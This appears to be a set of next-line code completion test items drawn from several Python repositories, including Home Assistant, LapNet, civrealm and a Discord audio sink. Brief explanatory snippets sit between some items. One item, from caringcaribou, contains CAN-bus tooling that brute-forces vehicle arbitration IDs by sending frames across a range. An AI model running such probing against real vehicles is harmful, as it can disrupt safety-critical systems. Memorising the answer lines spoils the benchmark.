icon="mdi:eye",
path="lastSeenText",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_charging",
name="is charging",
icon="mdi:battery-charging",
path="battery",
subpath="isCharging",
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="shortName",
name="shortname",
icon="mdi:rename-outline",
path="shortName",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="full_name",
name="full name",
icon="mdi:car",
path="name",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_alive",
name="Is alive",
icon="mdi:shield-account",
path="isAlive",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="schedule",
name="schedule",
icon="mdi:battery-clock",
path="schedule",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="id",
name="id",
icon="mdi:car",
path="id",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="range",
name="Range",
icon="mdi:map-marker-distance",
path=None,
subpath=None,
unit="km",
round_digits=0,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.DISTANCE,
),
)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigEntry,
async_add_entities: AddEntitiesCallback,
discovery_info=None):
pass
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback):
"""Set up using config_entry."""
# get the device
| tibberApi: TibberApi |
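The "range" sensor has no data path and a km unit, which suggests it is derived from the battery percentage and the MAX_CHARGE_RANGE constant. A sketch of that assumed formula (the integration's real computation may differ):

MAX_CHARGE_RANGE = 375  # km, from const.py above

def estimated_range(battery_percent: float) -> int:
    # assumption: a full battery corresponds to MAX_CHARGE_RANGE km
    return round(battery_percent / 100 * MAX_CHARGE_RANGE)

print(estimated_range(80))  # 300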
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: bytedance/LapNet
# Path: lapnet/base_config.py
class SystemType(enum.IntEnum):
MOLECULE = enum.auto()
def has_value(cls, value):
def default() -> ml_collections.ConfigDict:
def resolve(cfg):
# Path: lapnet/utils/system.py
class Atom:
def _set_default_charge(self):
def _set_default_atomic_number(self):
def __attrs_post_init__(self):
def coords_angstrom(self):
def coords_array(self):
def element(self):
def pyscf_mol_to_internal_representation(
mol: pyscf.gto.Mole) -> ml_collections.ConfigDict:
# Path: lapnet/utils/system.py
class Atom:
"""Atom information for Hamiltonians.
The nuclear charge is inferred from the symbol if not given, in which case the
symbol must be the IUPAC symbol of the desired element.
Attributes:
symbol: Element symbol.
coords: An iterable of atomic coordinates. Always a list of floats and in
bohr after initialisation. Default: place atom at origin.
charge: Nuclear charge. Default: nuclear charge (atomic number) of atom of
the given name.
atomic_number: Atomic number associated with element. Default: atomic number
of element of the given symbol. Should match charge unless fractional
nuclear charges are being used.
units: String giving units of coords. Either bohr or angstrom. Default:
bohr. If angstrom, coords are converted to be in bohr and units to the
string 'bohr'.
coords_angstrom: list of atomic coordinates in angstrom.
coords_array: Numpy array of atomic coordinates in bohr.
element: elements.Element corresponding to the symbol.
"""
symbol = attr.ib(type=str)
coords = attr.ib(
type=Sequence[float],
converter=lambda xs: tuple(float(x) for x in xs),
default=(0.0, 0.0, 0.0))
charge = attr.ib(type=float, converter=float)
atomic_number = attr.ib(type=int, converter=int)
units = attr.ib(
type=str,
default='bohr',
validator=attr.validators.in_(['bohr', 'angstrom']))
@charge.default
def _set_default_charge(self):
return self.element.atomic_number
@atomic_number.default
def _set_default_atomic_number(self):
return self.element.atomic_number
def __attrs_post_init__(self):
if self.units == 'angstrom':
self.coords = [unit_conversion.angstrom2bohr(x) for x in self.coords]
self.units = 'bohr'
@property
def coords_angstrom(self):
return [unit_conversion.bohr2angstrom(x) for x in self.coords]
@property
def coords_array(self):
if not hasattr(self, '_coords_arr'):
self._coords_arr = np.array(self.coords)
return self._coords_arr
@property
def element(self):
return elements.SYMBOLS[self.symbol]
# Path: lapnet/configs/benzene_dimer/benzene_dimer.py
from lapnet import base_config
from lapnet.utils import system
from lapnet.utils.system import Atom
# Copyright 2023 Bytedance Ltd. and/or its affiliate
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Settings in a config file are loaded by executing the get_config
# function.
# Geometry of the benzene single molecule is from https://pubs.acs.org/doi/10.1021/acs.jpclett.0c02621,
# which is at the MP2/6-31G* level.
def get_config(input_str):
'''
Return config for the benzene dimer with different bond lengths.
Use input_str to set the bond length,
e.g. --config lapnet/configs/benzene_dimer/benzene_dimer.py:4.95
'''
r_str= input_str
r = float(r_str)
# Get default options.
| cfg = base_config.default() |
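The Atom class converts angstrom coordinates to bohr through a unit_conversion module this row does not show. A sketch of that conversion using the CODATA Bohr radius:

BOHR_RADIUS_ANGSTROM = 0.529177210903  # CODATA 2018 value

def angstrom2bohr(x: float) -> float:
    return x / BOHR_RADIUS_ANGSTROM

print(angstrom2bohr(4.95))  # the example dimer separation above, in bohr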
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: svetlovtech/gptize
# Path: gptize/models.py
class File:
"""Class representing a file in the project."""
def __init__(self, file_name: str, directory: str):
self.file_name = file_name
self.directory = directory
self.content = ""
self.content_size = 0
self.is_binary = False
def __str__(self):
return f"File(name={self.file_name}, size={self.content_size} bytes)"
def __repr__(self):
return f"<File '{self.file_name}' at {self.directory}>"
# Path: gptize/models.py
class Project:
"""Class representing the project."""
def __init__(self, name: str, root_path: str):
self.name: str = name
self.files: List[File] = []
self.root_path: str = root_path
def __str__(self):
file_list = ', '.join(file.file_name for file in self.files)
return f"Project '{self.name}' with files: {file_list}"
def __repr__(self):
return f"<Project '{self.name}' with {len(self.files)} files>"
# Path: gptize/settings.py
class Settings:
DEFAULT_ENCODINGS = ['utf-8', 'latin-1', 'cp1252']
IGNORED_DIRECTORIES = ['.git', '.svn', '__pycache__']
GITIGNORE_PATH = '.gitignore'
MAX_FILE_SIZE_BYTES_LIMIT = 512 * 1024 * 1024 # 512 MB
MAX_TOKEN_COUNT_LIMIT = 2000000 # 2 million tokens
@staticmethod
def default_output_file():
current_time = datetime.now().strftime("%Y%m%d-%H%M%S")
return f"gptize-output-{current_time}.txt"
@staticmethod
def custom_output_file(target: str):
base_name = os.path.basename(target).replace(
' ', '_')
if not base_name or os.path.isdir(target):
base_name = 'folder' if os.path.isdir(target) else 'file'
current_time = datetime.now().strftime("%Y%m%d-%H%M%S")
return f"gptize-output-{base_name}-{current_time}.txt"
# Path: gptize/output_builder.py
class OutputBuilder:
def __init__(self):
self.content = ""
def write_common_header(self):
"""Write a common header to the content."""
self.content += "This file was generated using third party tool 'gptize'. For more information, visit https://github.com/svetlovtech/gptize\n"
self.content += "=" * 40 + "\n"
def write_project_header(self, project: Project):
"""Write a header for the project."""
self.content += f"Project Name: {project.name}\n"
self.content += f"Total Files: {len(project.files)}\n"
self.content += "=" * 40 + "\n"
def write_file_content(self, file: File):
if file.is_binary:
self.content += f"File: {file.directory} (Binary file present)\n"
else:
self.content += f"File: {file.directory}\n"
self.content += file.content + "\n"
def write_separator(self):
"""Write a separator."""
self.content += "=" * 40 + "\n"
def get_content(self) -> str:
"""Get the final combined content."""
return self.content
def __str__(self):
"""String representation of the OutputBuilder."""
return f"OutputBuilder with {len(self.content)} characters of content"
def __repr__(self):
"""Formal string representation of the OutputBuilder."""
return f"<OutputBuilder with {len(self.content)} characters>"
# Path: gptize/gptizer.py
import logging
import os
import pathspec
from .models import File, Project
from .settings import Settings
from .output_builder import OutputBuilder
class GPTizer:
def __init__(self):
self._project = None
self._gitignore = None
def process_directory(self, root_path: str):
"""
Processes all the files within a given directory. This method initializes
the Project object for the specified directory, loads the .gitignore patterns,
and populates the project with files that are not ignored by .gitignore.
The method traverses through the directory recursively and adds all relevant
files to the project's file list, ensuring that binary files and files
specified in .gitignore are not included.
Parameters:
root_path (str): The path to the root of the directory to be processed.
Raises:
FileNotFoundError: If the specified directory does not exist.
Exception: For any other issues encountered during the directory processing.
"""
project_name = os.path.basename(root_path)
self._project = Project(project_name, root_path)
self._gitignore = self.load_gitignore(root_path)
self.populate_files()
def process_file(self, file_path: str):
"""
Processes a single file. This method creates a Project object for the file,
treating the file as an individual project. It bypasses .gitignore processing,
as it is assumed that the specific file is intentionally selected for processing.
The method creates a File object for the specified file, reads its content,
and adds it to the project's file list. It handles binary and text files
accordingly.
Parameters:
file_path (str): The path to the file to be processed. This includes both
the directory path and file name.
Raises:
FileNotFoundError: If the specified file does not exist.
IOError: If there is an issue reading the file.
Exception: For any other unexpected issues encountered during file processing.
"""
root_path, file_name = os.path.split(file_path)
project_name = os.path.basename(root_path) if root_path else 'SingleFileProject'
self._project = Project(project_name, root_path or '.')
self._gitignore = pathspec.PathSpec.from_lines('gitwildmatch', [])
| file_obj = File(file_name, file_path) |
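process_file bypasses .gitignore by building an empty PathSpec, while process_directory loads real patterns. A short sketch of how pathspec behaves in both cases:

import pathspec

empty = pathspec.PathSpec.from_lines("gitwildmatch", [])  # single-file case
ignore = pathspec.PathSpec.from_lines("gitwildmatch", ["*.pyc", "build/"])

print(empty.match_file("main.pyc"))   # False: nothing is ignored
print(ignore.match_file("main.pyc"))  # True: matches *.pyc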
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: civrealm/civrealm
# Path: src/civrealm/envs/freeciv_wrapper/core.py
class Wrapper(gymnasium.Wrapper):
def reset(self, *, seed=None, options=None, **kwargs):
return self.env.reset(seed=seed, options=options, **kwargs)
# Path: src/civrealm/envs/freeciv_wrapper/utils.py
def onehotifier_maker(category):
if isinstance(category, int):
def onehot(obs):
if isinstance(obs, np.ndarray):
shape = obs.shape
else:
shape = (1,)
obs = int(obs)
result = (
np.zeros([*shape, category], dtype=np.int32)
if shape != (1,)
else np.zeros([category], dtype=np.int32)
)
with np.nditer(obs, op_flags=["readonly"], flags=["multi_index"]) as it:
for x in it:
if x != 255:
index = (
(
*(it.multi_index),
x,
)
if shape != (1,)
else (x,)
)
result[index] = 1
return result
elif isinstance(category, list):
def onehot(obs):
if isinstance(obs, np.ndarray):
shape = obs.shape
else:
shape = (1,)
result = (
np.zeros([*shape, len(category)], dtype=np.int32)
if shape != (1,)
else np.zeros([len(category)], dtype=np.int32)
)
with np.nditer(obs, op_flags=["readonly"], flags=["multi_index"]) as it:
for x in it:
index = (
(
*(it.multi_index),
category.index(x),
)
if shape != (1,)
else (category.index(x),)
)
result[index] = 1
return result
else:
raise NotImplementedError(f"Not implemented yet for type {type(category)}")
return onehot
# Path: src/civrealm/envs/freeciv_wrapper/tensor_base_wrapper.py
import numpy as np
from civrealm.envs import FreecivBaseEnv
from civrealm.envs.freeciv_wrapper.config import default_tensor_config
from .core import Wrapper
from .utils import onehotifier_maker
class TensorBase(Wrapper):
"""
A basic wrapper that deals with config loading and entity id recording,
required by all tensor-related wrappers.
Parameters
----------
env: FreecivBaseEnv
config: dict
tensor env configuration
Attributes
---------
config: dict
A dict that specifies all configurations related to tensor wrapper.
my_player_id: int
My player id.
unit_ids: list
A sorted list of my unit ids.
city_ids: list
A sorted list of my city ids.
others_unit_ids: list
A sorted list of others unit ids.
others_city_ids: list
A sorted list of others city ids.
dipl_ids : list
A list of others player ids.
units : dict
ruleset information about units.
unit_types :list
A list of all unit types.
unit_costs : list
A list of int indicating unit costs.
improvements : dict
Ruleset information about city improvements.
impr_costs :list
A list of int indicating city improvements costs.
"""
def __init__(self, env: FreecivBaseEnv, config: dict = default_tensor_config):
self.config = config
self.my_player_id = -1
# mutable ids
self.unit_ids = []
self.city_ids = []
self.others_unit_ids = []
self.others_city_ids = []
self.dipl_ids = []
# ruleset
self.units = {}
self.unit_types = []
self.unit_costs = []
self.improvements = {}
self.impr_costs = []
super().__init__(env)
def update_sequence_ids(self, observation):
"""
Use city, unit and dipl information in observation to update ids.
"""
self.unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] == self.my_player_id
)
)
self.others_unit_ids = sorted(
list(
k
for k in observation.get("unit", {}).keys()
if observation["unit"][k]["owner"] != self.my_player_id
)
)
self.city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] == self.my_player_id
)
)
self.others_city_ids = sorted(
list(
k
for k in observation.get("city", {}).keys()
if observation["city"][k]["owner"] != self.my_player_id
)
)
self.dipl_ids = [
player
for player in sorted(observation.get("dipl", {}).keys())
if player != self.my_player_id
]
def update_config(self):
"""
Update config using ruleset information at the start of the turn.
"""
self.units = self.unwrapped.civ_controller.rule_ctrl.unit_types
self.unit_types = [self.units[i]["name"] for i in range(len(self.units))]
self.unit_costs = [self.units[i]["build_cost"] for i in range(len(self.units))]
self.improvements = self.unwrapped.civ_controller.rule_ctrl.improvements
self.impr_costs = [
self.improvements[i]["build_cost"] for i in range(len(self.improvements))
]
| self.config["obs_ops"]["unit"]["type_rule_name"] = onehotifier_maker( |
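The predicted line wires onehotifier_maker into the observation config so unit types get one-hot encoded. A simplified 1-D version of the maker's list branch, with illustrative unit names rather than the real ruleset:

import numpy as np

def onehot_list(category: list, obs: list) -> np.ndarray:
    result = np.zeros([len(obs), len(category)], dtype=np.int32)
    for i, x in enumerate(obs):
        result[i, category.index(x)] = 1  # set the matching category index
    return result

unit_types = ["Settlers", "Warriors", "Workers"]  # illustrative names
print(onehot_list(unit_types, ["Warriors", "Settlers"]))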
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Sheppsu/discord-ext-listening
# Path: discord/ext/listening/enums.py
class RTCPMessageType(Enum):
sender_report = 200
receiver_report = 201
source_description = 202
goodbye = 203
application_defined = 204
# Path: discord/ext/listening/opus.py
class Decoder(BaseDecoder):
def packet_get_nb_channels(self, data: bytes) -> int:
return self.CHANNELS
# Path: discord/ext/listening/sink.py
import asyncio
import logging
import os
import queue
import struct
import subprocess
import threading
import wave
from collections import defaultdict
from dataclasses import dataclass
from time import monotonic
from typing import TYPE_CHECKING, Any, BinaryIO, Callable, Dict, List, Optional, Sequence, Tuple, Union
from discord.errors import ClientException
from discord.object import Object
from discord.player import CREATE_NO_WINDOW
from .enums import RTCPMessageType
from .opus import Decoder as OpusDecoder
from discord.member import Member
c: :class:`int`
The total number of RTP data packets from source SSRC that have
been lost since the beginning of reception.
ehsn: :class:`int`
The low 16 bits contain the highest sequence number received in an RTP
data packet from source SSRC, and the most significant 16 bits extend
that sequence number with the corresponding count of sequence number cycles.
j: :class:`int`
An estimate of the statistical variance of the RTP data packet interarrival
time, measured in timestamp units and expressed as an unsigned integer.
lsr: :class:`int`
The middle 32 bits out of 64 in the NTP timestamp received as part of the most
recent RTCP sender report (SR) packet from source SSRC. If no SR has been
received yet, the field is set to zero.
dlsr: :class:`int`
The delay, expressed in units of 1/65536 seconds, between receiving the last
SR packet from source SSRC and sending this reception report block. If no
SR packet has been received yet from SSRC, the DLSR field is set to zero.
"""
__slots__ = (
"ssrc",
"f",
"c",
"ehsn",
"j",
"lsr",
"dlsr",
)
ssrc: int
f: int
c: int
ehsn: int
j: int
lsr: int
dlsr: int
@dataclass
class RTCPSourceDescriptionItem:
"""An item of a :class:`RTCPSourceDescriptionChunk` object
Attributes
----------
cname: :class:`int`
Type of description.
description: :class:`bytes`
Description pertaining to the source of the chunk containing this item.
"""
__slots__ = (
"cname",
"description",
)
cname: int
description: bytes
@dataclass
class RTCPSourceDescriptionChunk:
"""A chunk of a :class:`RTCPSourceDescriptionPacket` object.
Contains items that describe a source.
Attributes
----------
ssrc: :class:`int`
The source which is being described.
items: Sequence[:class:`RTCPSourceDescriptionItem`]
A sequence of items which have a description.
"""
__slots__ = (
"ssrc",
"items",
)
ssrc: int
items: Sequence[RTCPSourceDescriptionItem]
class RTCPPacket:
"""Base class for all RTCP packet classes. Contains header attributes.
Read in detail here: https://www.freesoft.org/CIE/RFC/1889/19.htm
Attributes
----------
v: :class:`int`
Identifies the version of RTP, which is the same in RTCP packets
as in RTP data packets.
p: :class:`bool`
If the padding bit is set, this RTCP packet contains some additional
padding octets at the end which are not part of the control information.
The last octet of the padding is a count of how many padding octets
should be ignored.
rc: :class:`int`
Indicates the number of "items" within a packet. For sender and receiver
packets it indicates the number of Receiver Report Blocks.
pt: :class:`RTCPMessageType`
Indicates the RTCP packet type.
l: :class:`int`
The length of this RTCP packet in 32-bit words minus one, including
the header and any padding.
"""
__slots__ = (
"v",
"p",
"rc",
"pt",
"l",
)
if TYPE_CHECKING:
v: int
p: bool
rc: int
| pt: RTCPMessageType |
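The header fields described above (v, p, rc, pt, l) follow the standard RTCP layout from RFC 1889. A sketch of unpacking them from the first four bytes of a packet:

import struct

def parse_rtcp_header(data: bytes) -> dict:
    # byte 0: version (2 bits), padding (1 bit), report count (5 bits);
    # byte 1: packet type; bytes 2-3: length in 32-bit words minus one
    first, pt, length = struct.unpack(">BBH", data[:4])
    return {"v": first >> 6, "p": bool((first >> 5) & 1), "rc": first & 0x1F, "pt": pt, "l": length}

print(parse_rtcp_header(bytes([0x81, 200, 0x00, 0x06])))  # a sender_report header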
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: RAIVNLab/MatFormer-OLMo
# Path: olmo/aliases.py
# Path: olmo/util.py
def barrier() -> None:
if dist.is_available() and dist.is_initialized():
dist.barrier()
# Path: olmo/util.py
def get_global_rank() -> int:
return int(os.environ.get("RANK") or dist.get_rank())
# Path: olmo/util.py
def get_world_size() -> int:
if dist.is_available() and dist.is_initialized():
return dist.get_world_size()
else:
return 1
# Path: olmo/data/iterable_dataset.py
import logging
import math
import numpy as np
import torch
import torch.utils.data
from pathlib import Path
from typing import Any, Dict, Iterator, List, Optional, Sequence, Union
from ..aliases import PathOrStr
from ..util import barrier, get_global_rank, get_world_size
__all__ = ["IterableDataset"]
log = logging.getLogger(__name__)
class IterableDataset(torch.utils.data.IterableDataset[Dict[str, Any]]):
"""
Adapted from PyTorch's DistributedSampler, this wraps a Dataset or arbitrary sequence
as an IterableDataset that can be deterministically restarted at any point by setting `start_index`,
which should be a multiple of your global batch size.
Similarly `max_examples`, if set, should be a multiple of global batch size.
"""
def __init__(
self,
dataset: Union[Sequence[List[int]], Sequence[torch.Tensor], Sequence[Dict[str, Any]]],
*,
seed: int = 0,
start_index: int = 0,
max_examples: Optional[int] = None,
shuffle: bool = True,
drop_last: bool = False,
world_size: Optional[int] = None,
rank: Optional[int] = None,
work_dir: Optional[PathOrStr] = None,
):
self.dataset = dataset
self.seed = seed
self.start_index = start_index
self.max_examples = max_examples
self.shuffle = shuffle
self.drop_last = drop_last
self.rank = rank if rank is not None else get_global_rank()
self.world_size = world_size if world_size is not None else get_world_size()
# If the dataset length is evenly divisible by # of replicas, then there
# is no need to drop any data, since the dataset will be split equally.
if self.drop_last and len(self.dataset) % self.world_size != 0: # type: ignore[arg-type]
# Split to nearest available length that is evenly divisible by world size.
# This is to ensure each rank receives the same amount of data.
num_samples = math.ceil(
(len(self.dataset) - self.world_size) / self.world_size # type: ignore[arg-type]
)
else:
num_samples = math.ceil(len(self.dataset) / self.world_size) # type: ignore[arg-type]
self.total_size = num_samples * self.world_size
self.global_indices_file: Optional[Path] = None
if work_dir is not None:
self.global_indices_file = Path(work_dir) / "global_indices.npy"
if self.rank == 0:
log.info("Saving global data order indices...")
self.global_indices_file.parent.mkdir(parents=True, exist_ok=True)
global_indices = self._build_global_indices()
global_indices_mmap = np.memmap(
self.global_indices_file, dtype=np.uint64, mode="w+", shape=(len(global_indices),)
)
global_indices_mmap[:] = global_indices
global_indices_mmap.flush()
del global_indices_mmap
log.info("Global data order indices saved to '%s'", self.global_indices_file)
| barrier() |
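Rank 0 saves the shuffled indices with a raw np.memmap (no .npy header despite the file name) and other ranks read them back after the barrier. A standalone sketch of that save/load round trip:

import numpy as np

indices = np.random.default_rng(0).permutation(10).astype(np.uint64)

mmap = np.memmap("global_indices.npy", dtype=np.uint64, mode="w+", shape=indices.shape)
mmap[:] = indices
mmap.flush()
del mmap  # close the write mapping, as in the code above

loaded = np.memmap("global_indices.npy", dtype=np.uint64, mode="r", shape=indices.shape)
assert (loaded == indices).all()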
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: 1in-oos/ccplus
# Path: caringcaribou/utils/constants.py
ARBITRATION_ID_MAX = 0x7FF
# Path: caringcaribou/utils/constants.py
ARBITRATION_ID_MAX_EXTENDED = 0x18DAFFF1
# Path: caringcaribou/utils/constants.py
ARBITRATION_ID_MIN = 0x700
# Path: caringcaribou/utils/constants.py
BYTE_MAX = 0xFF
# Path: caringcaribou/utils/constants.py
BYTE_MIN = 0x00
# Path: caringcaribou/utils/can_actions.py
from caringcaribou.utils.constants import ARBITRATION_ID_MAX, ARBITRATION_ID_MAX_EXTENDED, ARBITRATION_ID_MIN, BYTE_MAX, BYTE_MIN
from sys import stdout, version_info
import can
import time
if print_results:
time_left = end_time - time.time()
num_matches = len(blacklist)
print("\r{0:> 5.1f} seconds left, {1} found".format(time_left, num_matches), end="")
stdout.flush()
# Receive message
msg = bus.recv(0.1)
if msg is None:
continue
# Classify
if classifier_function(msg):
# Add to blacklist
blacklist.add(msg.arbitration_id)
if print_results:
num_matches = len(blacklist)
print("\r 0.0 seconds left, {0} found".format(num_matches), end="")
if len(blacklist) > 0:
print("\n Detected IDs: {0}".format(" ".join(sorted(list(map(hex, blacklist))))))
else:
print()
return blacklist
class CanActions:
def __init__(self, arb_id=None, notifier_enabled=True):
"""
CanActions constructor
:param arb_id: int default arbitration ID for object or None
:param notifier_enabled: bool indicating whether a notifier for incoming message callbacks should be enabled
"""
self.bus = can.Bus(DEFAULT_INTERFACE)
self.arb_id = arb_id
self.bruteforce_running = False
self.notifier = None
if notifier_enabled:
self.enable_notifier()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.notifier is not None:
self.disable_notifier()
self.bus.shutdown()
def enable_notifier(self):
self.notifier = can.Notifier(self.bus, listeners=[])
def disable_notifier(self):
self.clear_listeners()
# Prevent threading errors by stopping notifier gracefully
self.notifier.stop(NOTIFIER_STOP_DURATION)
self.notifier = None
def add_listener(self, listener):
self.notifier.listeners.append(listener)
def clear_listeners(self):
self.notifier.listeners = []
def set_listener(self, listener):
self.clear_listeners()
self.add_listener(listener)
def send(self, data, arb_id=None, is_extended=None, is_error=False, is_remote=False):
if len(data) > 8:
raise IndexError("Invalid CAN message length: {0}".format(len(data)))
# Fallback to default arbitration ID (self.arb_id) if no other ID is specified
if arb_id is None:
if self.arb_id is None:
raise ValueError("Arbitration ID must be set through either 'arb_id' argument or self.arb_id")
arb_id = self.arb_id
# Force extended flag if it is unspecified and arbitration ID is larger than the standard format allows
if is_extended is None:
is_extended = arb_id > ARBITRATION_ID_MAX
msg = can.Message(arbitration_id=arb_id,
data=data,
is_extended_id=is_extended,
is_error_frame=is_error,
is_remote_frame=is_remote)
self.bus.send(msg)
def bruteforce_arbitration_id(self, data, callback, min_id, max_id,
callback_end=None):
# Set limits
if min_id is None:
min_id = ARBITRATION_ID_MIN
if max_id is None:
if min_id <= ARBITRATION_ID_MAX:
max_id = ARBITRATION_ID_MAX
else:
# If min_id is extended, use an extended default max_id as well
max_id = ARBITRATION_ID_MAX_EXTENDED
# Sanity checks
if min_id > max_id:
if callback_end:
callback_end("Invalid range: min > max")
return
# Start bruteforce
self.bruteforce_running = True
for arb_id in range(min_id, max_id + 1):
self.notifier.listeners = [callback(arb_id)]
# Use standard addressing (11 bits arbitration ID) instead of extended (29 bits) when possible
extended = False
if arb_id > ARBITRATION_ID_MAX:
extended = True
msg = can.Message(arbitration_id=arb_id, data=data, is_extended_id=extended)
self.bus.send(msg)
time.sleep(MESSAGE_DELAY)
# Return if stopped by calling module
if not self.bruteforce_running:
self.clear_listeners()
return
# Callback if bruteforce finished without being stopped
if callback_end:
self.clear_listeners()
callback_end("Bruteforce of range 0x{0:x}-0x{1:x} completed".format(min_id, max_id))
| def bruteforce_data(self, data, bruteforce_index, callback, min_value=BYTE_MIN, max_value=BYTE_MAX, |
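For context on the send/receive plumbing that CanActions wraps, here is a minimal python-can sketch that runs without CAN hardware. The virtual interface, channel name, and payload are illustrative assumptions (python-can 4.x keyword arguments), not part of the caringcaribou code:

import can

# Two buses on the same in-process virtual channel can exchange frames
tx_bus = can.Bus(interface="virtual", channel="vcan_demo")
rx_bus = can.Bus(interface="virtual", channel="vcan_demo")

msg = can.Message(arbitration_id=0x7E0, data=[0x02, 0x10, 0x01], is_extended_id=False)
tx_bus.send(msg)

received = rx_bus.recv(timeout=1.0)
if received is not None:
    print(hex(received.arbitration_id), received.data.hex())

tx_bus.shutdown()
rx_bus.shutdown()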
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: L1bra1/WeakMotion
# Path: weak_model.py
class PreSegNet(nn.Module):
def __init__(self, FGBG_category_num=2, height_feat_size=13):
super(PreSegNet, self).__init__()
self.FGBG_classify = FGBGEstimation(motion_category_num=FGBG_category_num)
self.stpn = STPN_Seg(height_feat_size=height_feat_size)
def forward(self, bevs):
bevs = bevs.permute(0, 1, 4, 2, 3) # (Batch, seq, z, h, w)
# Backbone network
x = self.stpn(bevs)
# FG/BG segmentation head
FGBG_class_pred = self.FGBG_classify(x)
return FGBG_class_pred
# Path: data/weak_utils.py
def remove_close(points, radius):
points = points.T
x_filt = np.abs(points[0, :]) < radius
y_filt = np.abs(points[1, :]) < radius
not_close = np.logical_not(np.logical_and(x_filt, y_filt))
points = points[:, not_close]
points = points.T
return points, not_close
# Path: data/weak_utils.py
def filter_pc(pc, extents):
filter_idx = np.where((extents[0, 0] < pc[:, 0]) & (pc[:, 0] < extents[0, 1]) &
(extents[1, 0] < pc[:, 1]) & (pc[:, 1] < extents[1, 1]) &
(extents[2, 0] < pc[:, 2]) & (pc[:, 2] < extents[2, 1]))[0]
pc = pc[filter_idx]
return pc, filter_idx
# Path: data/weak_utils.py
def convert_semantic_to_FGBG(cate):
    # Label ID 0: noise; Label ID 1~23: foreground classes; Label ID 24~31: background classes
# reference https://github.com/nutonomy/nuscenes-devkit/blob/master/docs/instructions_nuscenes.md
# and https://github.com/nutonomy/nuscenes-devkit/blob/master/docs/instructions_lidarseg.md
fg_mask = (0 < cate) & (cate < 24)
return fg_mask.astype(np.int32) + 1
# Path: data/weak_utils.py
def gen_voxel_indices_for_pc(pc, voxel_size, extents):
# Convert 3D coordinate to voxel index
discrete_pc = np.floor(pc[:, :3] / voxel_size).astype(np.int32)
min_voxel_coord = np.floor(extents.T[0] / voxel_size)
voxel_indices = (discrete_pc - min_voxel_coord).astype(int)
return voxel_indices
# Path: data/weak_utils.py
def convert_semantic_to_FGBG_waymo(cate):
# Label ID 0: Background; 1: Vehicle; 2: Pedestrian; 3: Cyclist; 4: Sign, regarded as background
fg_mask = (0 < cate) & (cate < 4)
return fg_mask.astype(np.int32) + 1
# Path: predict_FGBG_mask.py
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import time
import sys
import argparse
import os
from weak_model import PreSegNet
from data.weak_utils import remove_close, filter_pc, convert_semantic_to_FGBG, gen_voxel_indices_for_pc, convert_semantic_to_FGBG_waymo
from sklearn.metrics import confusion_matrix
from tqdm import tqdm
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
height_feat_size = 13 # The size along the height dimension
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default='/path_to/nuScenes/weak-data/train', type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('-s', '--save_FB', default='/path_to/nuScenes/FGBG-data/', type=str, help='The path where the predicted FG/BG masks will be saved')
parser.add_argument('--datatype', default='nuScenes', type=str, choices=['Waymo', 'nuScenes'])
parser.add_argument('--pretrained', default='pretrained/nuscenes_seg_0-01.pth', type=str)
parser.add_argument('--gpu', default='0')
args = parser.parse_args()
print(args)
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
datatype = args.datatype
def main():
# Specify gpu device
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
device_num = torch.cuda.device_count()
print("device number", device_num)
voxel_size = (0.25, 0.25, 0.4)
if datatype == 'nuScenes':
area_extents = np.array([[-32., 32.], [-32., 32.], [-3., 2.]])
elif datatype == 'Waymo':
area_extents = np.array([[-32., 32.], [-32., 32.], [-1., 4.]])
dims = (256, 256, 13)
| model = PreSegNet(FGBG_category_num=2, height_feat_size=height_feat_size) |
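As a quick illustration of the voxel-index arithmetic in gen_voxel_indices_for_pc above, here is a self-contained numpy example using the same (0.25, 0.25, 0.4) voxel size and nuScenes extents as main(); the toy points are made up:

import numpy as np

voxel_size = np.array([0.25, 0.25, 0.4])
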